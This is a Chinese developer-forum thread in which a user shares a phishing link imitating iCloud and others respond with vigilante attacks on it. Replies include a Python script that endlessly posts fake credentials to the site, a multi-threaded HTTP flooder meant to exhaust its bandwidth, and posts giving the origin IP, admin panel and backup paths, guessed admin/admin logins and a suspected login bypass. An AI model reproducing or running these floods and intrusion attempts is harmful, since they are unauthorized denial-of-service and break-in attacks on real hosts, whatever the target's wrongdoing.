搞搞这帮小贼。。。

2017-01-08 14:47:18 +08:00
 pudgeee
女票手机昨儿被偷了,气愤中。。。今天骗子给我发诈骗账号密码的短信,里面有个伪装 icloud 页面的的链接
http://www.apple-icloudc.cn/I_APPID2/?YVJXKGNJUCKFRWSQRLITRTJIYIMDKOGPFYHTIKHJ
看了他的源码,如果真有人输入帐号密码了,会把信息 post 到 ../IPASS.asp , 无奈,后面就不知道怎么搞了,希望大家都来瞅瞅,有空的一起搞搞啊。。
11307 次点击
所在节点    程序员
81 条回复
dikT
2017-01-08 17:23:19 +08:00
# language: python


def post():
url = 'http://www.apple-icloudc.cn/IPASS.asp'
data = dict(sjname=123,
sjpass=123,
submit='登录')
headers = {'Cookie': 'PWSBMJSDSUIPPUOMDATL=OXVIFWPVJALCSXQNBGYOKCMAUQLNROTEDYSJIMEY',
'Origin': 'http://www.apple-icloudc.cn',
'Referer':'http://www.apple-icloudc.cn/I_APPID2/?YVJXKGNJUCKFRWSQRLITRTJIYIMDKOGPFYHTIKHJ',
}
req = urllib.request.Request(url, data=urllib.parse.urlencode(data).encode(), headers=headers)
page = urllib.request.urlopen(req).read().decode('gbk')
print(page)
dikT
2017-01-08 17:24:50 +08:00
def post():
url = 'http://www.apple-icloudc.cn/IPASS.asp'
headers = {'Cookie': 'PWSBMJSDSUIPPUOMDATL=OXVIFWPVJALCSXQNBGYOKCMAUQLNROTEDYSJIMEY',
'Origin': 'http://www.apple-icloudc.cn',
'Referer':'http://www.apple-icloudc.cn/I_APPID2/?YVJXKGNJUCKFRWSQRLITRTJIYIMDKOGPFYHTIKHJ',
}
i = 0
while 1:
i += 1
data = dict(sjname=i,
sjpass=i,
submit='登录')
req = urllib.request.Request(url, data=urllib.parse.urlencode(data).encode(), headers=headers)
page = urllib.request.urlopen(req).read().decode('gbk')
print(page)

if __name__ == '__main__':
post()
dikT
2017-01-08 17:35:28 +08:00
怎么就被搞挂了....
hrong
2017-01-08 17:35:51 +08:00
这个网站现在已经没法访问了。
timothyye
2017-01-08 17:48:00 +08:00
哈哈,程序员不好惹
ericbize
2017-01-08 18:03:32 +08:00
好像,那个网站有 cdn , 跑死了就没戏了,慢慢跑,跑流量 1T 300 元,可以跑到小贼破产啊 ~~~~

import urllib
import urllib2
import threading
import time

print 'ctrl and z stop the program'
thr=input("how many thread do you need : (the thread should be lower then 10 , otherwise gg)")
cycle=input ("how many cycle do you need : ")
address= raw_input("plaese input the address")
start = time.clock()

def printf(i):
for x in xrange(cycle):
down(x)
end = time.clock()
print ' ' + 'T' + i + " " +"using: %f s" % (end - start)


def down(x):
url = (address)
d=urllib2.urlopen(url)
data = d.read()
print x,

def test():
thread_list = []
for i in xrange(thr):
sthread = threading.Thread(target = printf, args = str(i))
sthread.start()
thread_list.append(sthread)

if __name__ == '__main__':
test()
wudaonongjian
2017-01-08 18:09:24 +08:00
@wlh233 紫缘是专门做钓鱼网站卖给别人的,几年前的 qq 钓鱼网站也是他们的杰作
LGA1150
2017-01-08 18:37:07 +08:00
@dikT
@hrong
停止解析了,不过还可以通过原 IP 118.184.45.161 继续 POST
roist
2017-01-08 18:43:51 +08:00
据相关报道称,这个紫缘的作者早被抓了?
vizards
2017-01-08 18:44:03 +08:00
取消解析了而已,源站 ip 118.184.45.161 ,后台管理 http://118.184.45.161/manager/
assassinpig
2017-01-08 18:48:52 +08:00
http://118.184.45.161/backup/
assassinpig
2017-01-08 18:52:26 +08:00
@vizards 你真快
admin
admin
admin
assassinpig
2017-01-08 18:54:25 +08:00
@pudgeee
http://118.184.45.161/manager/admin.asp
Nitroethane
2017-01-08 19:15:43 +08:00
这个早就被人搞过了,某乎上相关文章
ghostcir
2017-01-08 19:33:29 +08:00
IP 是 51idc 的,去举报呗
dzhlovecoding
2017-01-08 19:38:45 +08:00
为什么我手机端的 V2EX 不能发表主题
Hihh
2017-01-08 20:05:17 +08:00
这应该是一条黑色产业链
有人专门偷手机有人专门钓鱼
这种钓鱼网站在手机浏览器比如 safari 是不会提示的,在 pc 上 360 会提示(之前上过当,输过密码,然后几个苹果设备的数据都被抹了。。
feifan00x
2017-01-08 20:13:25 +08:00
厉害了,表哥们
hjlmjx
2017-01-08 20:17:45 +08:00
苹果手机都是这一套产业链。偶尔还会以假的苹果客服给你打电话。前面没有上海的区号。不行就发钓鱼信息,钓鱼邮件来骗取 appleid
J0022ZjV7055oN64
2017-01-08 20:35:26 +08:00
@assassinpig 点击一次登陆 然后 重新访问这个地址就能进后台 是漏洞?

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://tanronggui.xyz/t/333062

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX